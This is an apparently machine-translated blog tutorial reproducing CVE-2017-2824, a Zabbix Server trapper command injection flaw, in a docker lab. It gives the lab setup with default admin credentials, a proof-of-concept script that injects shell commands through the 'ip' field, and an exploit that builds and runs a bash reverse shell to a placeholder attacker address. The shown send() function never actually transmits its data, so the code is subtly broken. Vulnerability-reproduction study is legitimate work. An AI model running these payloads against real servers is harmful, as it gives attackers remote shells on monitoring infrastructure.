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ZABBIX server trap command injection vulnerability (cve-2017-2824)
2022-07-02 05:58:00 【H-neck white cap】
List of articles
This article is only for technology learning and vulnerability recurrence , Do not use it for unauthorized penetration testing , Bear in mind !
One 、 Vulnerability profile
Zabbix By Alexei Vladishev Developed a kind of network monitoring 、 Management system , be based on Server-Client framework . Its Server End trapper command There is a Code Execution Vulnerability in the function , Specific packets can cause command injection , Then execute the code remotely . An attacker can start from a Zabbix proxy Initiate request , Which triggers the vulnerability .
Two 、 scope
Zabbix Server 2.4.X edition
3、 ... and 、 Environment building
Vulfocus:docker pull vulfocus/zabbix-cve_2017_2824:latest
View the local image and run the vulnerability environment
docker images
docker run -d -P vulfocus/zabbix-cve_2017_2824
-d: Suspend the image from running in the background
-P: Randomly map the port that needs to be opened to the public network of this server IP On port
visit ip:port Build successfully , Use the default administrator account password to enter the background
user name :admin
password :Zabbix
next stay Configuration
Enter in the tab of Actions
with hands Event source Choose Auto registration
, Click on Create action
, Start the automatic registration function as an administrator
After the operation is completed, the automatic registration function is enabled .
Four 、 Local actual combat
POC test
Using links :https://github.com/listenquiet/cve-2017-2824-reverse-shell
import sys
import socket
import json
import sys
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
data = conn.recv(2048)
return data
target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
for i in range(10000, 10500):
data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
if data and b'failed' not in data:
print('hostid: %d' % i)
Use ls /tmp
Check whether the command is executed successfully
rebound Shell
Exp as follows :
import sys
import socket
import json
from time import sleep
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
data = conn.recv(2048)
return data
# target = "X.X.X.X"
target = sys.argv[1]
num = 1
exps = [';echo -n "/bin/bash" > /tmp/1.sh', ';echo -n " -i >& " >> /tmp/1.sh', ';echo -n "/dev/tcp/" >> /tmp/1.sh',
';echo -n "X.X." >> /tmp/1.sh', ';echo -n "X.X/" >> /tmp/1.sh', ';echo -n "1234 0>&1" >> /tmp/1.sh',
';/bin/bash /tmp/1.sh']
for exp in exps:
host = "vulhub" + str(num)
print(send(target, {"request": "active checks", "host": host, "ip": exp}))
num += 1
for i in range(10000, 10500):
data = send(target, {"request": "command", "scriptid": 1, "hostid": str(i)})
if data and b'failed' not in data:
print('hostid: %d' % i)
perform :python3 exp.py X.X.X.X
You can see that it has rebounded Shell
Attack complete !!!
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